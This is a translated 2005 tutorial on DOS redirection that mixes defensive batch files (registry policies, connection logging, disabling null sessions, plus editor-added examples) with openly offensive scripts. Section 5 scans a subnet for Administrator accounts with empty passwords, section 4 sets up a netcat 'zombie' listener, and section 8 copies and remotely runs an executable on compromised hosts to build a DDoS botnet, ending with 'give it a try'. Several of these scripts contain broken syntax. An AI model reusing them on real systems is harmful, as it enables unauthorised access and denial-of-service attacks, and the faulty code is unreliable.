===================;
The following is reprinted from
www.bluedon.com
===================;
Offensive and Defensive Uses of the Redirection Command
[2005-7-21 10:08:00]
Everyone knows that DOS has a command that is rarely used: the redirection command. This little thing is very useful, and it works just as well under Win9x/ME/2000/XP. Used flexibly, it brings great convenience, whether for intrusion, for defence or for everyday system administration. Today let's look at several examples of using redirection in security work.
I. Command Format
Under DOS, standard input and output normally go through the standard devices, the keyboard and the display. With redirection, input and output can conveniently be pointed at disk files or other devices instead. Specifically:
1. The greater-than sign ">" sends a command's output to a file or device, for example to the printer with >prn. With ">" alone, some command output (such as error messages) is not redirected.
2. The double greater-than sign ">>" appends the command output to the end of the file without deleting what the file already contains.
3. The less-than sign "<" takes the input a command needs from a file instead of the keyboard.
4. The >& notation redirects one default I/O stream (stdin, stdout, stderr) into another. For example, command >output_file 2>&1 sends all error messages produced while running command to the file that receives standard output, instead of to the screen. The handle numbers of the standard streams are:
Standard stream    Handle number
stdin              0
stdout             1
stderr             2
Of the forms above, 1 and 2 both create the target file if it does not exist; 4 may not be available under plain DOS.
II. Output of Redirection Commands
Almost all commands send their output to the screen. Even commands that send output to a drive or printer still display messages and prompts on the screen. To redirect output from the screen to a file or printer, use the greater-than sign (>), which works with most commands. For example, the following command redirects the directory listing produced by dir to the file Dirlist.txt: dir >dirlist.txt. If Dirlist.txt does not exist, the system creates it; if it already exists, its contents are replaced by the output of dir.
To append command output to the end of a file without losing anything already in it, use the double greater-than sign (>>). For example, the following command appends the directory listing produced by dir to Dirlist.txt: dir >>dirlist.txt. Redirecting input works the same way: just as command output can be sent to a file or printer instead of the screen, a command's input can be taken from a file instead of the keyboard. To take input from a file, use the less-than sign (<). For example, the following command takes the input of the sort command from List.txt: sort <list.txt
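The following batch file is an added example, not part of the original article, that exercises every redirection form from sections I and II in one place. It assumes cmd.exe (Windows 2000/XP, where the numbered handles of item 4 are available); the file names and the non-existent directory are placeholders chosen for the demonstration.

```batch
@echo off
rem Added example, not from the original article: each redirection form from
rem sections I and II, run under cmd.exe (Windows 2000/XP, where handle
rem numbers are supported). All file names below are placeholders written
rem to the current directory.

rem ">" creates or overwrites, ">>" appends. Build a small unsorted input file.
echo delta>names.txt
echo alpha>>names.txt
echo charlie>>names.txt

rem "<" feeds the file to sort's standard input in place of the keyboard.
sort <names.txt >sorted.txt

rem Handle 1 is stdout, handle 2 is stderr. A plain ">" captures only handle 1,
rem so the "File Not Found" message still appears on the screen here.
dir c:\no_such_dir_placeholder >out.txt

rem Send stderr to its own file ...
dir c:\no_such_dir_placeholder >out.txt 2>err.txt

rem ... or merge it into stdout. Order matters: "2>&1" must come after ">file",
rem because it copies wherever handle 1 points at that moment.
dir c:\no_such_dir_placeholder >both.txt 2>&1

rem Throw everything away; only the exit code is of interest.
dir c:\no_such_dir_placeholder >nul 2>&1
if errorlevel 1 echo directory is missing, and nothing was printed

rem "echo." writes an empty line. Writing the redirection before the command
rem keeps the echoed text unambiguous even when it ends in a digit.
>>sorted.txt echo.
>>sorted.txt echo line ending in digit 1

type sorted.txt
```

Run it from any writable directory; sorted.txt ends up with the three names in order, an empty line and the final text line, while err.txt and both.txt show where the "File Not Found" message went in each variant.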
III. Application Examples
1. Locking/Unlocking the Registry
Everyone knows that if the DWORD value DisableRegistryTools under the branch HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System is set to 1, the registry is locked and nobody can use the registry editor. With the redirection command, the registry can be locked and unlocked from DOS, which is very convenient.
Open the Notepad program, create a new text file, and enter the following content:
@rem Write the .reg file from scratch (">" on the first line) so a leftover 123.reg is not appended to.
@echo REGEDIT4>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@rem /s imports the file silently, without the confirmation dialog.
@regedit /s 123.reg
@deltree /y 123.reg
Save it as a batch file with the .bat extension; double-click the file and the registry is locked!
In the commands above, echo is the DOS command that prints text. The "@" prefix stops the line itself from being displayed as it runs; remove the "@" if you want to watch the script execute. When typing the code, note that "REGEDIT4" on the first line must be in capitals, that there is no space between "echo" and "." on the second line, and that the line in square brackets is the key path given above, which the .reg file needs before the value. Everything produced by ">>" is appended to the file named after it. The final line, deltree /y 123.reg, deletes 123.reg without asking for confirmation.
To unlock the registry, edit the batch file: change "DisableRegistryTools"=dword:00000001 to "DisableRegistryTools"=dword:00000000, leave everything else as it is, save it as a .bat file, and double-click it to unlock the registry.
2. Recording the IP Addresses of Machines Connecting to Port 3389
Save the following as 3389IP.bat:
time /t >>log.log
netstat -n -p tcp | find ":3389" >>log.log
start explorer
Run 3389IP.bat, then open log.log to see the IP addresses of the machines connected to port 3389. Convenient, isn't it?
3. Restoring DOS Real Mode
Everyone knows that some malicious web pages modify the visitor's registry; among the many tricks they use, one is to disable DOS real mode through the registry. There are many ways to restore DOS real mode; combining a batch file with the redirection command is a rather special one, shared here.
@echo off
rem Build a .reg file that clears the NoRealMode policy, then import it silently.
rem Key path supplied by the editor (the article omits it): the Win9x WinOldApp policy key.
echo REGEDIT4>c:\scanreg.reg
echo.>>c:\scanreg.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
del c:\scanreg.reg
Save it as a batch file with the .bat extension; double-click it and DOS real mode is restored, so DOS applications can be used again.
4. Waiting for Zombies to Come Knocking
Isn't it tiring to hunt for zombie machines every day? With the redirection command and a batch file you can find them the easy way! Create a new text file in Notepad and enter the following:
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
Save it as a .bat file (you need nc.exe beforehand; it is the main program of the network diagnostic tool Netcat). Run it, then just wait for the zombies to come to you! With luck, 10 a day is no problem.
5. Quickly Establishing Null Sessions
A null session (empty connection) is a session established with a server without any credentials; in other words, anonymous access to the server. The command net use \\IP\ipc$ "" /user:"" establishes a null session with the target (IPC$ must be available on the target). With the redirection command and the for command you can quickly attempt null sessions against a whole Class C network segment and save the results to a file for analysis. Edit a file in Notepad with the following content:
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt
Save the batch file as .bat and run it. It tries, in turn, to establish an ipc$ connection with the account administrator and an empty password to each of the 254 IP addresses in the Class C segment you specify, and records each success in test.txt. This amounts to an NT weak-password scan! The for command executes a given command for each file in a set of files, that is, it generates a series of commands over a loop range you specify. The format of the for command is: FOR %variable IN (set) DO command, where:
%variable: a single-letter replaceable parameter.
(set): one file or a set of files; wildcards may be used.
command: the command to execute for each file.
command-parameters: parameters or command-line switches for that command.
When using FOR in a batch file, write the variable as %%variable rather than %variable. Variable names are case-sensitive, so %i and %I are different.
6. Disabling Null Sessions
Null sessions carry a certain amount of risk, so it is better to disable them! Enter net share to view the local shared resources, then enter the following commands to delete the shares:
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (drives such as e, f and so on can be deleted the same way)
Then create a new text file in Notepad and enter the following:
@echo REGEDIT4>123.reg
@echo.>>123.reg
@rem Key path supplied by the editor (the article omits it): RestrictAnonymous lives under the Lsa key.
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@regedit /s 123.reg
@deltree /y 123.reg
Save it as a batch file with the .bat extension; double-click it and null sessions are disabled.
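The three registry scripts in sections 1, 3 and 6 all do the same thing: write a .reg file with echo and redirection, import it silently, and delete it. The batch file below is an added example, not from the original article, that folds them into one subroutine taking the key path, value name and DWORD as arguments, and reads the value back afterwards so the change is confirmed rather than assumed. It assumes cmd.exe on Windows 2000/XP (for %~1 argument handling and reg query); the Lsa and WinOldApp key paths are supplied here because the article does not give them, and the REGFILE location is a placeholder.

```batch
@echo off
rem Added example, not from the original article: one reusable subroutine that
rem writes a .reg file with echo and redirection, imports it silently, and
rem reads the value back. It covers the three policies the article sets in
rem sections 1, 3 and 6. Requires cmd.exe (Windows 2000/XP) for %~1 and
rem "reg query"; the Lsa and WinOldApp key paths are supplied here because
rem the article does not give them.
setlocal
set POL_SYS=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
set POL_DOS=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp
set LSA=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

if /i "%1"=="lock"     call :setdword "%POL_SYS%" DisableRegistryTools 00000001
if /i "%1"=="unlock"   call :setdword "%POL_SYS%" DisableRegistryTools 00000000
if /i "%1"=="realmode" call :setdword "%POL_DOS%" NoRealMode 00000000
if /i "%1"=="noanon"   call :setdword "%LSA%" RestrictAnonymous 00000001
if "%1"=="" echo usage: %~nx0 lock ^| unlock ^| realmode ^| noanon
goto :eof

rem Subroutine: %1 = key path, %2 = value name, %3 = 8-digit hex DWORD.
:setdword
set REGFILE=%TEMP%\policy.reg
>%REGFILE%  echo REGEDIT4
>>%REGFILE% echo.
>>%REGFILE% echo [%~1]
>>%REGFILE% echo "%~2"=dword:%~3
>>%REGFILE% echo.
regedit /s %REGFILE%
del %REGFILE%
rem Read the value back so the change is confirmed rather than assumed.
reg query "%~1" /v %~2
goto :eof
```

Usage is, for example, policy.bat noanon. Note that the net share deletions in section 6 only last until the next reboot, because Windows re-creates the administrative shares at startup; the RestrictAnonymous value, by contrast, persists, which is why the .reg import is the part worth keeping.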
7. Logging All Computers with TCP Connections to This Machine
Scanning your own computer's ports and finding unusual ports open can reveal trojans. Beyond that, the following batch file records the IP addresses of every computer that has a TCP connection to this machine. The .bat file contains:
date /t>>123.log
time /t>>123.log
rem The trailing 10 makes netstat print the table again every 10 seconds until Ctrl+C, so the log keeps growing.
rem The redirection is written first so the interval digit cannot be mistaken for a handle number.
>>123.log netstat -n -p tcp 10
This records not only the other party's IP address but also the date and time, which makes reviewing the log easy.
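As an added example that is not part of the original article, the batch file below generalizes the connection loggers of sections 2 and 7 and puts the FOR /F syntax explained in section 5 to defensive use: on every interval it stamps the date and time, keeps only ESTABLISHED TCP sessions to the watched port, and splits the remote ip:port so the address is logged on its own. The port, interval and log file name are placeholders of my choosing, and it assumes cmd.exe on Windows 2000/XP.

```batch
@echo off
rem Added example, not from the original article: a defender's connection log
rem that generalizes sections 2 and 7. Every interval it stamps the date and
rem time, records ESTABLISHED TCP sessions to the chosen port, and extracts
rem the remote address with FOR /F. Port, interval and log name are
rem placeholders. Requires cmd.exe (Windows 2000/XP); stop with Ctrl+C.
setlocal
set PORT=3389
set LOGFILE=conn.log
set INTERVAL=10

:loop
>>%LOGFILE% echo ----
>>%LOGFILE% date /t
>>%LOGFILE% time /t
rem Columns of "netstat -n -p tcp": Proto  Local Address  Foreign Address  State
rem ":%PORT% " with a trailing space matches only the local port column exactly.
for /f "tokens=2,3,4" %%A in ('netstat -n -p tcp ^| find ":%PORT% " ^| find "ESTABLISHED"') do (
    rem %%B is remote ip:port; keep the part before the colon.
    for /f "tokens=1 delims=:" %%R in ("%%B") do >>%LOGFILE% echo remote=%%R local=%%A state=%%C
)
rem ping to localhost doubles as a sleep of roughly INTERVAL seconds.
ping -n %INTERVAL% 127.0.0.1 >nul
goto loop
```

Each pass appends a separator, the date, the time and one remote= line per established session, so a later find "remote=" conn.log lists every address that ever connected, and find /c "remote=" conn.log counts them.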
8. Automatically Harvesting DDoS Zombies
DDoS is the abbreviation of Distributed Denial of Service, which means distributed denial of service attack. It refers to using client/server technology to combine multiple computers as attack platforms to launch DoS attacks on one or more targets, thereby multiplying the power of denial of service attacks. Usually, the attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program will communicate with a large number of agent programs, which have been installed on many computers on the Internet. When the agent program receives the instruction, it launches the attack. Using client/server technology, the master program can activate the operation of hundreds or thousands of agent programs in a few seconds.
Although using DDoS to attack is not recommended, it is still worth understanding the technique. But how do you obtain zombie machines for a DDoS attack? Save the following as ok.bat:
@echo off
echo Automatically Obtain DDoS Shepherd Machines
for /f "tokens=1,3*" %i in (host.txt) do net use \%k\ipc$ /user:"%j"
copy %1 \%i\admin$\sysytem32
if errorelevel 0 goto success
psexec -d \%i c:\winnt\sys_tem(remove "_")32%1
net user \%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo Shepherd Machine:%i>>success.txt
echo Username:%j>>success.txt
echo Password:%k>>success.txt
echo ------------------------------>>success.txt
Usage: ok.bat *.exe host.txt, where each line of host.txt has the format: ip administrator password. Okay, give it a try. But don't use it for destruction.
In fact, the methods in this article rely mainly on batch files and the related commands; the redirection command is only the "glue" that joins them together, but its contribution is not small, so don't forget about it.